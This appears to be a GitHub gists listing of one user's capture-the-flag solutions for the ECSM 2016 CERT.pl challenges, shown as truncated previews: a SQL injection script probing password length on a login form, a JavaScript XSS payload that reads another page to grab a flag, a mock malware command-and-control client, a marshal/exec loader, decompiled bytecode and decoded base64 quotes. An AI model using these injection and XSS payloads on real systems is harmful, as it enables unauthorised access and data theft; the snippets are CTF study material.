Paweł Łukasik pawlos

import hashlib
import struct
import zlib
import base64
def k(l,key):
l='{}{}'.format(l,struct.pack('i',zlib.crc32(l)))
m=[]
for i in range(len(l)):
o=key[i%len(key)]
import requests # http stuff
import trojan # good thing python has everything
import time # got the time
# my secret malware panel
CNC_URL = 'https://secretpanel.ecsm2016.cert.pl'
CNC_PATH = '/get_command'
def cnc_get_command():
# get command from c&c
pawlos / extract-password.py
Last active February 18, 2019 11:46
Script to extract passwords
import requests
username = 'hacker'
for password_length in range(1,30):
password = "' or (username = '"+username+"' and LENGTH(password)="+str(password_length)+")-- "
result = requests.post('https://secretpanel.ecsm2016.cert.pl/login', data={'username': username, 'password':password})
if 'Logged in successfully' in result.text:
break
elif 'Internal Server Error' in result.text:
pawlos / steal-the-flag.js
Created November 15, 2016 13:02
JS script that extracts the flag
<script>xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
var doc = $(xmlhttp.responseText);
var href = "https://secretmessage.ecsm2016.cert.pl/"+$($(doc.find('.messages .message')[4]).find('span')[0]).find('a').attr('href');
req = new XMLHttpRequest();
req.onreadystatechange=function()
{
pawlos / admin.php
Created November 15, 2016 21:48
Corrupted admin.php script
<?php
require('../auth_funcs.php');
ini_set('display_errors', 1);
error_reporting(E_ALL);
$auth = false;
if (isset($_COOKIE['remember_me'])) {
$obj = json_decode($_COOKIE['remember_me'], true);
pawlos / decompiled.py
Last active November 22, 2016 10:27
decompiled Python file
# 2016.11.22 11:24:48 CET
#Embedded file name: task.py
# Loader stub (Python 2 syntax): base64-decodes an embedded blob, unmarshals it
# and executes the result. The program's real logic is inside the blob, so this
# file reveals nothing about behaviour until the blob itself is inspected.
import marshal
# Python 2 only: str.decode('base64') converts the embedded literal to raw bytes.
src = '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'.decode('base64')
# NOTE(review): marshal is not hardened against malformed or hostile input;
# unmarshal blobs of unknown origin only inside a disposable analysis sandbox.
# The result is presumably a code object, given that it is passed to exec below.
code = marshal.loads(src)
# NOTE(review): exec runs whatever the blob contains with this process's
# privileges. For static analysis, disassemble the object instead
# (e.g. dis.dis(code)) rather than executing it.
exec code
pawlos / bytecode.py
Created November 22, 2016 10:30
Python bytecode extracted
3 0 LOAD_CONST 1 ('')
3 LOAD_ATTR 0 (join)
6 BUILD_LIST 0
9 LOAD_CONST 2 ('^')
12 LOAD_CONST 3 ('4')
15 LOAD_CONST 4 ('K')
18 LOAD_CONST 5 ('i')
21 LOAD_CONST 6 ('.')
24 LOAD_CONST 7 ('/')
27 LOAD_CONST 8 ('N')
pawlos / reconstructed.py
Created November 22, 2016 10:33
Reconstructed python code
tmp = ''
w = ''.join(['^','4','K','i','.','/','N','j','P','o','?','l','2','T','?'])
for e in w:
tmp = tmp + chr(ord(e)+3)
print 'You pass:'
passwd = raw_input()
if tmp == passwd:
t = ''.join(['s','y','n','t',':','{','w','q','E','6','f','X','u','o','f','a','4','X','N','u','1','}'])
pawlos / data.txt
Created November 22, 2016 11:42
Base64 strings that are transmitted from the service
Qm9vbXN0aWNrOiAkMTk5Ljk5LCBTaGVsbHM6IDM5Ljk5LCBab21iaWVzIGhlYWRzIGJsb3dpbmcgb2ZmOiBwcmljZWxlc3MuCg==
SSdsbCBzd2FsbG93IHlvdXIgc291bCEgSSdsbCBzd2FsbG93IHlvdXIgc291bCEgSSdsbCBzd2FsbG93IHlvdXIgc291bCEgU3dhbGxvdyB0aGlzLgo=
U3VyZSwgSSBjb3VsZCBoYXZlIHN0YXllZCBpbiB0aGUgcGFzdC4gSSBjb3VsZCBoYXZlIGV2ZW4gYmVlbiBraW5nLiBCdXQgaW4gbXkgb3duIHdheSwgSSAqYW0qIGtpbmcuCg==
R3Jvb3Z5Lgo=
QWZ0ZXIgYWxsLCBJJ20gYSBtYW4gYW5kIHlvdSdyZSBhIHdvbWFuLi4uIGF0IGxlYXN0IGxhc3QgdGltZSBJIGNoZWNrZWQuIEh1aCBodWguCg==
Qm9vbXN0aWNrOiAkMTk5Ljk5LCBTaGVsbHM6IDM5Ljk5LCBab21iaWVzIGhlYWRzIGJsb3dpbmcgb2ZmOiBwcmljZWxlc3MuCg==
T2ggdGhhdCdzIGp1c3Qgd2hhdCB3ZSBjYWxsIHBpbGxvdyB0YWxrLCBiYWJ5LCB0aGF0J3MgYWxsLgo=
V2VsbCBoZWxsbyBNaXN0ZXIgRmFuY3lwYW50cy4gV2VsbCwgSSd2ZSBnb3QgbmV3cyBmb3IgeW91IHBhbCwgeW91IGFpbid0IGxlYWRpbicgYnV0IHR3byB0aGluZ3MsIHJpZ2h0IG5vdzogSmFjayBhbmQgc2hpdC4uLiBhbmQgSmFjayBsZWZ0IHRvd24uCg==
TG9vaywgbWF5YmUgSSBkaWRuJ3Qgc2F5IGV2ZXJ5IHNpbmdsZSBsaXR0bGUgdGlueSBzeWxsYWJsZSwgbm8uIEJ1dCBiYXNpY2FsbHkgSSBzYWlkIHRoZW0sIHllYWguCg==
R3Jvb3Z5Lgo=
pawlos / quotes.txt
Created November 22, 2016 11:43
Decoded base64 strings
Boomstick: $199.99, Shells: 39.99, Zombies heads blowing off: priceless.
I'll swallow your soul! I'll swallow your soul! I'll swallow your soul! Swallow this.
Sure, I could have stayed in the past. I could have even been king. But in my own way, I *am* king.
Groovy.
After all, I'm a man and you're a woman... at least last time I checked. Huh huh.